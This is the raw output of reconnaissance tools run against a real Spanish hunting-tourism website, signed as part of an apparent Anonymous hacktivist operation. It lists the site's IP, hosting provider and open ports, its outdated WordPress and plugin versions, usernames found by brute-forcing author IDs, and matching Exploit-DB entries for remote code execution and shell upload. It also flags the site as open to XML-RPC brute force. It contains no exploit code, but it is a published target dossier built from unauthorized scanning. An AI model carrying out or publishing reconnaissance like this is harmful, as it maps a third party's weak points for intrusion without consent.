15242| [16689] MySQL mysql_install_db Symlink Arbitrary File Overwrite
15243| [16056] Plans Unspecified mySQL Remote Password Disclosure
15244| [15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow
15245| [15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow
15246| [15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow
15247| [15451] paNews auth.php mysql_prefix Parameter SQL Injection
15248| [14748] MySQL MS-DOS Device Names Request DoS
15249| [14678] MySQL CREATE FUNCTION Arbitrary libc Code Execution
15250| [14677] MySQL CREATE FUNCTION mysql.func Table Arbitrary Library Injection
15251| [14676] MySQL CREATE TEMPORARY TABLE Symlink Privilege Escalation
15252| [14386] phpMyAdmin mysqli.dbi.lib.php Path Disclosure
15253| [14052] Symantec Brightmail AntiSpam Multiple Default MySQL Accounts
15254| [13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS
15255| [13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS
15256| [13013] MySQL mysqlaccess.sh Symlink Arbitrary File Manipulation
15257| [12919] MySQL MaxDB WebAgent websql Remote Overflow
15258| [12779] MySQL User Defined Function Privilege Escalation
15259| [12609] MySQL Eventum projects.php Multiple Parameter XSS
15260| [12608] MySQL Eventum preferences.php Multiple Parameter XSS
15261| [12607] MySQL Eventum forgot_password.php email Parameter XSS
15262| [12606] MySQL Eventum index.php email Parameter XSS
15263| [12605] MySQL Eventum Default Vendor Account
15264| [12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS
15265| [12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow
15266| [11689] Roxen Web Server MySQL Socket Permission Weakness
15267| [10985] MySQL MATCH..AGAINST Query DoS
15268| [10959] MySQL GRANT ALL ON Privilege Escalation
15269| [10660] MySQL ALTER TABLE/RENAME Forces Old Permission Checks
15270| [10659] MySQL ALTER MERGE Tables to Change the UNION DoS
15271| [10658] MySQL mysql_real_connect() Function Remote Overflow
15272| [10532] MySQL MaxDB webdbm Server Field DoS
15273| [10491] AWS MySQLguest AWSguest.php Script Insertion
15274| [10244] MySQL libmysqlclient Prepared Statements API Overflow
15275| [10226] MySQLGuest AWSguest.php Multiple Field XSS
15276| [9912] PHP safe_mode MySQL Database Access Restriction Bypass
15277| [9911] Inter7 vpopmail MySQL Module Authentication Credential Disclosure
15278| [9910] MySQL mysql_change_user() Double-free Memory Pointer DoS
15279| [9909] MySQL datadir/my.cnf Modification Privilege Escalation
15280| [9908] MySQL my.ini Initialization File datadir Parameter Overflow
15281| [9907] MySQL SELECT Statement String Handling Overflow
15282| [9906] MySQL GRANT Privilege Arbitrary Password Modification
15283| [9509] teapop MySQL Authentication Module SQL Injection
15284| [9018] MySQL Backup Pro getbackup() Method Unspecified Issue
15285| [9015] MySQL mysqlhotcopy Insecure Temporary File Creation
15286| [8997] Cacti config.php MySQL Authentication Credential Cleartext Disclosure
15287| [8979] MySQL SHOW GRANTS Encrypted Password Disclosure
15288| [8889] MySQL COM_TABLE_DUMP Package Negative Integer DoS
15289| [8888] MySQL COM_CHANGE_USER Command Long Repsonse Overflow
15290| [8887] MySQL COM_CHANGE_USER Command One Character Password Brute Force
15291| [8886] MySQL libmysqlclient Library read_one_row Overflow
15292| [8885] MySQL libmysqlclient Library read_rows Overflow
15293| [7476] MySQL Protocol 4.1 Authentication Scramble String Overflow
15294| [7475] MySQL Zero-length Scrambled String Crafted Packet Authentication Bypass
15295| [7245] MySQL Pluggable Authentication Module (pam_mysql) Password Disclosure
15296| [7128] MySQL show database Database Name Exposure
15297| [6716] MySQL Database Engine Weak Authentication Information Disclosure
15298| [6605] MySQL mysqld Readable Log File Information Disclosure
15299| [6443] PowerPhlogger db_dump.php View Arbitrary mySQL Dump
15300| [6421] MySQL mysqld_multi Symlink Arbitrary File Overwrite
15301| [6420] MySQL mysqlbug Symlink Arbitrary File Overwrite
15302| [2537] MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
15303| [2144] WinMySQLadmin my.ini Cleartext Password Disclosure
15304| [653] PCCS-Linux MySQL Database Admin Tool Authentication Credential Disclosure
15305| [520] MySQL Database Name Traversal Arbitrary File Modification
15306| [380] MySQL Server on Windows Default Null Root Password
15307| [261] MySQL Short Check String Authentication Bypass
15308|_
153098443/tcp open ssl/http sw-cp-server httpd (Plesk Onyx 17.8.11)
15310|_http-server-header: sw-cp-server
15311| vulscan: VulDB - https://vuldb.com:
15312| No findings
15313|
15314| MITRE CVE - https://cve.mitre.org:
15315| No findings
15316|
15317| SecurityFocus - https://www.securityfocus.com/bid/:
15318| No findings
15319|
15320| IBM X-Force - https://exchange.xforce.ibmcloud.com:
15321| No findings
15322|
15323| Exploit-DB - https://www.exploit-db.com:
15324| No findings
15325|
15326| OpenVAS (Nessus) - http://www.openvas.org:
15327| No findings
15328|
15329| SecurityTracker - https://www.securitytracker.com:
15330| No findings
15331|
15332| OSVDB - http://www.osvdb.org:
15333| No findings
15334###################################################################################################################################
15335[+] URL: http://www.cazahispanica.com/
15336[+] Started: Sun Jan 5 03:08:46 2020
15337
15338Interesting Finding(s):
15339
15340[+] http://www.cazahispanica.com/
15341 | Interesting Entries:
15342 | - Server: Apache
15343 | - X-Powered-By: PHP/5.6.40, PleskLin
15344 | Found By: Headers (Passive Detection)
15345 | Confidence: 100%
15346
15347[+] http://www.cazahispanica.com/robots.txt
15348 | Interesting Entries:
15349 | - /wp-admin/
15350 | - /wp-admin/admin-ajax.php
15351 | Found By: Robots Txt (Aggressive Detection)
15352 | Confidence: 100%
15353
15354[+] http://www.cazahispanica.com/xmlrpc.php
15355 | Found By: Link Tag (Passive Detection)
15356 | Confidence: 100%
15357 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
15358 | References:
15359 | - http://codex.wordpress.org/XML-RPC_Pingback_API
15360 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
15361 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
15362 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
15363 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
15364
15365[+] http://www.cazahispanica.com/readme.html
15366 | Found By: Direct Access (Aggressive Detection)
15367 | Confidence: 100%
15368
15369[+] http://www.cazahispanica.com/wp-cron.php
15370 | Found By: Direct Access (Aggressive Detection)
15371 | Confidence: 60%
15372 | References:
15373 | - https://www.iplocation.net/defend-wordpress-from-ddos
15374 | - https://github.com/wpscanteam/wpscan/issues/1299
15375
15376[+] WordPress version 4.4.21 identified (Latest, released on 2019-12-12).
15377 | Found By: Rss Generator (Passive Detection)
15378 | - http://www.cazahispanica.com/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15379 | - http://www.cazahispanica.com/comments/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15380
15381[+] WordPress theme in use: medacorp
15382 | Location: http://www.cazahispanica.com/wp-content/themes/medacorp/
15383 | Style URL: http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0
15384 | Style Name: MedaCorp
15385 | Style URI: http://medacorp.novademo.com/
15386 | Description: MedaCorp - The Ultimate WordPress Theme...
15387 | Author: Novaworks
15388 | Author URI: http://www.novaworks.net/
15389 |
15390 | Found By: Css Style In Homepage (Passive Detection)
15391 | Confirmed By: Css Style In 404 Page (Passive Detection)
15392 |
15393 | Version: 1.1.3 (80% confidence)
15394 | Found By: Style (Passive Detection)
15395 | - http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0, Match: 'Version: 1.1.3'
15396
15397[+] Enumerating All Plugins (via Passive Methods)
15398[+] Checking Plugin Versions (via Passive and Aggressive Methods)
15399
15400[i] Plugin(s) Identified:
15401
15402[+] essential-grid
15403 | Location: http://www.cazahispanica.com/wp-content/plugins/essential-grid/
15404 | Latest Version: 1.1.1
15405 | Last Updated: 2019-07-30T22:13:00.000Z
15406 |
15407 | Found By: Urls In Homepage (Passive Detection)
15408 | Confirmed By: Urls In 404 Page (Passive Detection)
15409 |
15410 | The version could not be determined.
15411
15412[+] js_composer
15413 | Location: http://www.cazahispanica.com/wp-content/plugins/js_composer/
15414 |
15415 | Found By: Urls In Homepage (Passive Detection)
15416 | Confirmed By:
15417 | Urls In 404 Page (Passive Detection)
15418 | Meta Generator (Passive Detection)
15419 | Body Tag (Passive Detection)
15420 |
15421 | Version: 4.6.1 (60% confidence)
15422 | Found By: Body Tag (Passive Detection)
15423 | - http://www.cazahispanica.com/, Match: 'js-comp-ver-4.6.1'
15424
15425[+] landing-pages
15426 | Location: http://www.cazahispanica.com/wp-content/plugins/landing-pages/
15427 | Last Updated: 2019-10-22T15:52:00.000Z
15428 | [!] The version is out of date, the latest version is 2.7.9
15429 |
15430 | Found By: Urls In Homepage (Passive Detection)
15431 | Confirmed By: Urls In 404 Page (Passive Detection)
15432 |
15433 | Version: 2.0.5 (100% confidence)
15434 | Found By: Readme - Stable Tag (Aggressive Detection)
15435 | - http://www.cazahispanica.com/wp-content/plugins/landing-pages/readme.txt
15436 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
15437 | - http://www.cazahispanica.com/wp-content/plugins/landing-pages/readme.txt
15438
15439[+] revslider
15440 | Location: http://www.cazahispanica.com/wp-content/plugins/revslider/
15441 |
15442 | Found By: Urls In Homepage (Passive Detection)
15443 | Confirmed By:
15444 | Urls In 404 Page (Passive Detection)
15445 | Comment (Passive Detection)
15446 |
15447 | Version: 4.6.0 (100% confidence)
15448 | Found By: Comment (Passive Detection)
15449 | - http://www.cazahispanica.com/, Match: 'START REVOLUTION SLIDER 4.6.0'
15450 | Confirmed By: Release Log (Aggressive Detection)
15451 | - http://www.cazahispanica.com/wp-content/plugins/revslider/release_log.html, Match: 'Version 4.6 SkyWood (25th August 2014)'
15452
15453[+] wordpress-seo
15454 | Location: http://www.cazahispanica.com/wp-content/plugins/wordpress-seo/
15455 | Last Updated: 2019-12-12T08:32:00.000Z
15456 | [!] The version is out of date, the latest version is 12.7.1
15457 |
15458 | Found By: Comment (Passive Detection)
15459 |
15460 | Version: 3.0.7 (100% confidence)
15461 | Found By: Comment (Passive Detection)
15462 | - http://www.cazahispanica.com/, Match: 'optimized with the Yoast SEO plugin v3.0.7 -'
15463 | Confirmed By:
15464 | Readme - Stable Tag (Aggressive Detection)
15465 | - http://www.cazahispanica.com/wp-content/plugins/wordpress-seo/readme.txt
15466 | Readme - ChangeLog Section (Aggressive Detection)
15467 | - http://www.cazahispanica.com/wp-content/plugins/wordpress-seo/readme.txt
15468
15469[+] Enumerating Config Backups (via Passive and Aggressive Methods)
15470 Checking Config Backups - Time: 00:00:10 <=============> (21 / 21) 100.00% Time: 00:00:10
15471
15472[i] No Config Backups Found.
15473
15474[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
15475[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
15476
15477[+] Finished: Sun Jan 5 03:09:32 2020
15478[+] Requests Done: 68
15479[+] Cached Requests: 10
15480[+] Data Sent: 16.785 KB
15481[+] Data Received: 293.96 KB
15482[+] Memory used: 176.837 MB
15483[+] Elapsed time: 00:00:46
15484###################################################################################################################################
15485[+] URL: http://www.cazahispanica.com/
15486[+] Started: Sun Jan 5 03:08:52 2020
15487
15488Interesting Finding(s):
15489
15490[+] http://www.cazahispanica.com/
15491 | Interesting Entries:
15492 | - Server: Apache
15493 | - X-Powered-By: PHP/5.6.40, PleskLin
15494 | Found By: Headers (Passive Detection)
15495 | Confidence: 100%
15496
15497[+] http://www.cazahispanica.com/robots.txt
15498 | Interesting Entries:
15499 | - /wp-admin/
15500 | - /wp-admin/admin-ajax.php
15501 | Found By: Robots Txt (Aggressive Detection)
15502 | Confidence: 100%
15503
15504[+] http://www.cazahispanica.com/xmlrpc.php
15505 | Found By: Link Tag (Passive Detection)
15506 | Confidence: 100%
15507 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
15508 | References:
15509 | - http://codex.wordpress.org/XML-RPC_Pingback_API
15510 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
15511 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
15512 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
15513 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
15514
15515[+] http://www.cazahispanica.com/readme.html
15516 | Found By: Direct Access (Aggressive Detection)
15517 | Confidence: 100%
15518
15519[+] http://www.cazahispanica.com/wp-cron.php
15520 | Found By: Direct Access (Aggressive Detection)
15521 | Confidence: 60%
15522 | References:
15523 | - https://www.iplocation.net/defend-wordpress-from-ddos
15524 | - https://github.com/wpscanteam/wpscan/issues/1299
15525
15526[+] WordPress version 4.4.21 identified (Latest, released on 2019-12-12).
15527 | Found By: Rss Generator (Passive Detection)
15528 | - http://www.cazahispanica.com/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15529 | - http://www.cazahispanica.com/comments/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15530
15531[+] WordPress theme in use: medacorp
15532 | Location: http://www.cazahispanica.com/wp-content/themes/medacorp/
15533 | Style URL: http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0
15534 | Style Name: MedaCorp
15535 | Style URI: http://medacorp.novademo.com/
15536 | Description: MedaCorp - The Ultimate WordPress Theme...
15537 | Author: Novaworks
15538 | Author URI: http://www.novaworks.net/
15539 |
15540 | Found By: Css Style In Homepage (Passive Detection)
15541 | Confirmed By: Css Style In 404 Page (Passive Detection)
15542 |
15543 | Version: 1.1.3 (80% confidence)
15544 | Found By: Style (Passive Detection)
15545 | - http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0, Match: 'Version: 1.1.3'
15546
15547[+] Enumerating Users (via Passive and Aggressive Methods)
15548 Brute Forcing Author IDs - Time: 00:00:12 <==> (10 / 10) 100.00% Time: 00:00:12
15549
15550[i] User(s) Identified:
15551
15552[+] cazahispanica
15553 | Found By: Rss Generator (Passive Detection)
15554 | Confirmed By:
15555 | Rss Generator (Aggressive Detection)
15556 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
15557
15558[+] wordpress%20support
15559 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
15560
15561[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
15562[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
15563
15564[+] Finished: Sun Jan 5 03:09:29 2020
15565[+] Requests Done: 38
15566[+] Cached Requests: 22
15567[+] Data Sent: 9.762 KB
15568[+] Data Received: 551.326 KB
15569[+] Memory used: 118.65 MB
15570[+] Elapsed time: 00:00:36
15571###################################################################################################################################
15572[+] URL: http://www.cazahispanica.com/
15573[+] Started: Sun Jan 5 03:13:17 2020
15574
15575Interesting Finding(s):
15576
15577[+] http://www.cazahispanica.com/
15578 | Interesting Entries:
15579 | - Server: Apache
15580 | - X-Powered-By: PHP/5.6.40, PleskLin
15581 | Found By: Headers (Passive Detection)
15582 | Confidence: 100%
15583
15584[+] http://www.cazahispanica.com/robots.txt
15585 | Interesting Entries:
15586 | - /wp-admin/
15587 | - /wp-admin/admin-ajax.php
15588 | Found By: Robots Txt (Aggressive Detection)
15589 | Confidence: 100%
15590
15591[+] http://www.cazahispanica.com/xmlrpc.php
15592 | Found By: Link Tag (Passive Detection)
15593 | Confidence: 100%
15594 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
15595 | References:
15596 | - http://codex.wordpress.org/XML-RPC_Pingback_API
15597 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
15598 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
15599 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
15600 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
15601
15602[+] http://www.cazahispanica.com/readme.html
15603 | Found By: Direct Access (Aggressive Detection)
15604 | Confidence: 100%
15605
15606[+] http://www.cazahispanica.com/wp-cron.php
15607 | Found By: Direct Access (Aggressive Detection)
15608 | Confidence: 60%
15609 | References:
15610 | - https://www.iplocation.net/defend-wordpress-from-ddos
15611 | - https://github.com/wpscanteam/wpscan/issues/1299
15612
15613[+] WordPress version 4.4.21 identified (Latest, released on 2019-12-12).
15614 | Found By: Rss Generator (Passive Detection)
15615 | - http://www.cazahispanica.com/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15616 | - http://www.cazahispanica.com/comments/feed/, <generator>https://wordpress.org/?v=4.4.21</generator>
15617
15618[+] WordPress theme in use: medacorp
15619 | Location: http://www.cazahispanica.com/wp-content/themes/medacorp/
15620 | Style URL: http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0
15621 | Style Name: MedaCorp
15622 | Style URI: http://medacorp.novademo.com/
15623 | Description: MedaCorp - The Ultimate WordPress Theme...
15624 | Author: Novaworks
15625 | Author URI: http://www.novaworks.net/
15626 |
15627 | Found By: Css Style In Homepage (Passive Detection)
15628 | Confirmed By: Css Style In 404 Page (Passive Detection)
15629 |
15630 | Version: 1.1.3 (80% confidence)
15631 | Found By: Style (Passive Detection)
15632 | - http://www.cazahispanica.com/wp-content/themes/medacorp/style.css?ver=1.0.0, Match: 'Version: 1.1.3'
15633
15634[+] Enumerating Users (via Passive and Aggressive Methods)
15635 Brute Forcing Author IDs - Time: 00:00:04 <============> (10 / 10) 100.00% Time: 00:00:04
15636
15637[i] User(s) Identified:
15638
15639[+] cazahispanica
15640 | Found By: Rss Generator (Passive Detection)
15641 | Confirmed By:
15642 | Rss Generator (Aggressive Detection)
15643 | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
15644
15645[+] wordpress%20support
15646 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
15647
15648[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
15649[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
15650
15651[+] Finished: Sun Jan 5 03:13:25 2020
15652[+] Requests Done: 14
15653[+] Cached Requests: 46
15654[+] Data Sent: 3.368 KB
15655[+] Data Received: 51.596 KB
15656[+] Memory used: 117.869 MB
15657[+] Elapsed time: 00:00:08
15658####################################################################################################################################
15659[INFO] ------TARGET info------
15660[*] TARGET: http://www.cazahispanica.com/
15661[*] TARGET IP: 217.160.131.142
15662[INFO] NO load balancer detected for www.cazahispanica.com...
15663[*] DNS servers: dns47.servidoresdns.net.
15664[*] TARGET server: Apache
15665[*] CC: DE
15666[*] Country: Germany
15667[*] RegionCode: BW
15668[*] RegionName: Baden-Württemberg
15669[*] City: Karlsruhe
15670[*] ASN: AS8560
15671[*] BGP_PREFIX: 217.160.0.0/16
15672[*] ISP: ONEANDONE-AS 1&1 IONOS SE, DE
15673[INFO] DNS enumeration:
15674[*] webmail.cazahispanica.com serviciodecorreo.es. 82.223.190.234
15675[INFO] Possible abuse mails are:
15676[*] abuse@1and1.com
15677[*] abuse@cazahispanica.com
15678[*] abuse@www.cazahispanica.com
15679[INFO] NO PAC (Proxy Auto Configuration) file FOUND
15680[ALERT] robots.txt file FOUND in http://www.cazahispanica.com/robots.txt
15681[INFO] Checking for HTTP status codes recursively from http://www.cazahispanica.com/robots.txt
15682[INFO] Status code Folders
15683[*] 200 http://www.cazahispanica.com/wp-admin/admin-ajax.php
15684[INFO] Starting FUZZing in http://www.cazahispanica.com/FUzZzZzZzZz...
15685[INFO] Status code Folders
15686[ALERT] Look in the source code. It may contain passwords
15687[INFO] Links found from http://www.cazahispanica.com/ http://217.160.131.142/:
15688[*] https://instagram.com/cazahispanica/
15689[*] https://plus.google.com/+Cazahispanica
15690[*] https://plus.google.com/u/0/109493036396885801729/videos
15691[*] https://twitter.com/cazahispanica
15692[*] https://www.facebook.com/CazaHispanica
15693[*] https://www.plesk.com/
15694[*] http://www.cazahispanica.com/
15695[*] http://www.cazahispanica.com/about-us/
15696[*] http://www.cazahispanica.com/about-us/conventions/
15697[*] http://www.cazahispanica.com/about-us/media/
15698[*] http://www.cazahispanica.com/blog/
15699[*] http://www.cazahispanica.com/comments/feed/
15700[*] http://www.cazahispanica.com/contact-us/
15701[*] http://www.cazahispanica.com/faq/
15702[*] http://www.cazahispanica.com/feed/
15703[*] http://www.cazahispanica.com/hunting/
15704[*] http://www.cazahispanica.com/hunting/hunting-experience/
15705[*] http://www.cazahispanica.com/hunting/hunting-experience/documents/
15706[*] http://www.cazahispanica.com/hunting/hunting-experience/hosting-and-accommodation/
15707[*] http://www.cazahispanica.com/hunting/hunting-experience/hunting-in-spain-video-collection/
15708[*] http://www.cazahispanica.com/hunting/hunting-experience/hunt-in-spain-getting-ready/
15709[*] http://www.cazahispanica.com/hunting/hunting-experience/meals-and-boards/
15710[*] http://www.cazahispanica.com/hunting/hunting-experience/photos-hunting-in-spain/
15711[*] http://www.cazahispanica.com/hunting/hunting-experience/taxidermy/
15712[*] http://www.cazahispanica.com/hunting/hunting-experience/the-hunt/
15713[*] http://www.cazahispanica.com/hunting/hunting-experience/transport-and-company/
15714[*] http://www.cazahispanica.com/hunting/spain-hunting-packages/
15715[*] http://www.cazahispanica.com/hunting/species/
15716[*] http://www.cazahispanica.com/hunting/species/balearean-goat-2/
15717[*] http://www.cazahispanica.com/hunting/species/chamois-2/
15718[*] http://www.cazahispanica.com/hunting/species/deer/
15719[*] http://www.cazahispanica.com/hunting/species/red-legged-partridge/
15720[*] http://www.cazahispanica.com/hunting/species/spanish-ibex/
15721[*] http://www.cazahispanica.com/hunting/species/spanish-wolf/
15722[*] http://www.cazahispanica.com/hunting/species/wild-boar/
15723[*] http://www.cazahispanica.com/hunting/species/wild-sheep/
15724[*] http://www.cazahispanica.com/hunting/tourism-and-sightseeing/
15725[*] http://www.cazahispanica.com/#mobile-menu
15726[*] http://www.cazahispanica.com/testimonials/
15727[*] http://www.cazahispanica.com/#top
15728[*] http://www.parallels.com/
15729[*] http://www.parallels.com/intro
15730[*] http://www.parallels.com/products/automation/intro
15731[*] http://www.parallels.com/products/desktop/intro
15732[*] http://www.parallels.com/products/desktop/pd4wl/intro
15733cut: intervalle de champ incorrecte
15734Saisissez « cut --help » pour plus d'informations.
15735[INFO] Shodan detected the following opened ports on 217.160.131.142:
15736[*] 21
15737[*] 214
15738[*] 22
15739[*] 3306
15740[*] 443
15741[*] 80
15742[*] 8443
15743[*] 8880
15744[INFO] ------VirusTotal SECTION------
15745[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
15746[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
15747[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
15748[INFO] ------Alexa Rank SECTION------
15749[INFO] Percent of Visitors Rank in Country:
15750[INFO] Percent of Search Traffic:
15751[INFO] Percent of Unique Visits:
15752[INFO] Total Sites Linking In:
15753[*] Total Sites
15754[INFO] Useful links related to www.cazahispanica.com - 217.160.131.142:
15755[*] https://www.virustotal.com/pt/ip-address/217.160.131.142/information/
15756[*] https://www.hybrid-analysis.com/search?host=217.160.131.142
15757[*] https://www.shodan.io/host/217.160.131.142
15758[*] https://www.senderbase.org/lookup/?search_string=217.160.131.142
15759[*] https://www.alienvault.com/open-threat-exchange/ip/217.160.131.142
15760[*] http://pastebin.com/search?q=217.160.131.142
15761[*] http://urlquery.net/search.php?q=217.160.131.142
15762[*] http://www.alexa.com/siteinfo/www.cazahispanica.com
15763[*] http://www.google.com/safebrowsing/diagnostic?site=www.cazahispanica.com
15764[*] https://censys.io/ipv4/217.160.131.142
15765[*] https://www.abuseipdb.com/check/217.160.131.142
15766[*] https://urlscan.io/search/#217.160.131.142
15767[*] https://github.com/search?q=217.160.131.142&type=Code
15768[INFO] Useful links related to AS8560 - 217.160.0.0/16:
15769[*] http://www.google.com/safebrowsing/diagnostic?site=AS:8560
15770[*] https://www.senderbase.org/lookup/?search_string=217.160.0.0/16
15771[*] http://bgp.he.net/AS8560
15772[*] https://stat.ripe.net/AS8560
15773[INFO] Date: 05/01/20 | Time: 03:14:17
15774[INFO] Total time: 0 minute(s) and 56 second(s)
15775####################################################################################################################################
15776[-] Target: http://www.cazahispanica.com (217.160.131.142)
15777[M] Website Not in HTTPS: http://www.cazahispanica.com
15778[I] Server: Apache
15779[I] X-Powered-By: PHP/5.6.40
15780[L] X-Frame-Options: Not Enforced
15781[I] Strict-Transport-Security: Not Enforced
15782[I] X-Content-Security-Policy: Not Enforced
15783[I] X-Content-Type-Options: Not Enforced
15784[L] Robots.txt Found: http://www.cazahispanica.com/robots.txt
15785[I] CMS Detection: WordPress
15786[I] Wordpress Version: 4.4.21
15787[M] EDB-ID: 47720 "WordPress Core 5.3 - User Disclosure"
15788[M] EDB-ID: 47800 "WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service"
15789[M] EDB-ID: 47557 "WordPress Core 5.2.4 - Cross-Origin Resource Sharing"
15790[M] EDB-ID: 47361 "WordPress 5.2.3 - Cross-Site Host Modification"
15791[M] EDB-ID: 47690 "WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts"
15792[M] EDB-ID: 46460-wordpress-5
15793[M] EDB-ID: 46511 "WordPress Core 5.0 - Remote Code Execution"
15794[M] EDB-ID: 46662 "WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)"
15795[M] EDB-ID: 44949 "WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion"
15796[M] EDB-ID: 41963 "WordPress < 4.7.4 - Unauthorized Password Reset"
15797[M] EDB-ID: 41497 "WordPress < 4.7.1 - Username Enumeration"
15798[M] EDB-ID: 41223 "WordPress 4.7.0/4.7.1 - Content Injection (Python)"
15799[M] EDB-ID: 41224 "WordPress 4.7.0/4.7.1 - Content Injection (Ruby)"
15800[M] EDB-ID: 41962 "WordPress 4.6 - Remote Code Execution"
15801[M] EDB-ID: 42024 "WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)"
15802[M] EDB-ID: 40288 "WordPress 4.5.3 - Directory Traversal / Denial of Service"
15803[I] Wordpress Theme: medacorp
15804[-] WordPress usernames identified:
15805[M] cazahispanica
15806[M] support
15807[M] wordpresssupport
15808[M] XML-RPC services are enabled
15809[M] Website vulnerable to XML-RPC Brute Force Vulnerability
15810[I] Autocomplete Off Not Found: http://www.cazahispanica.com/wp-login.php
15811[-] Default WordPress Files:
15812[I] http://www.cazahispanica.com/license.txt
15813[I] http://www.cazahispanica.com/readme.html
15814[I] http://www.cazahispanica.com/wp-includes/ID3/license.commercial.txt
15815[I] http://www.cazahispanica.com/wp-includes/ID3/license.txt
15816[I] http://www.cazahispanica.com/wp-includes/ID3/readme.txt
15817[I] http://www.cazahispanica.com/wp-includes/images/crystal/license.txt
15818[I] http://www.cazahispanica.com/wp-includes/js/plupload/license.txt
15819[I] http://www.cazahispanica.com/wp-includes/js/swfupload/license.txt
15820[I] http://www.cazahispanica.com/wp-includes/js/tinymce/license.txt
15821[-] Searching Wordpress Plugins ...
15822[I] akismet
15823[M] EDB-ID: 37826 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities"
15824[M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
15825[I] essential-grid
15826[I] feed
15827[M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
15828[I] js_composer
15829[I] landing-pages
15830[I] revslider
15831[I] Checking for Directory Listing Enabled ...
15832[-] Date & Time: 05/01/2020 03:14:02
15833[-] Completed in: 0:05:08
15834######################################################################################################################################
15835 Anonymous JTSEC #OpDefendTheWild Full Recon #8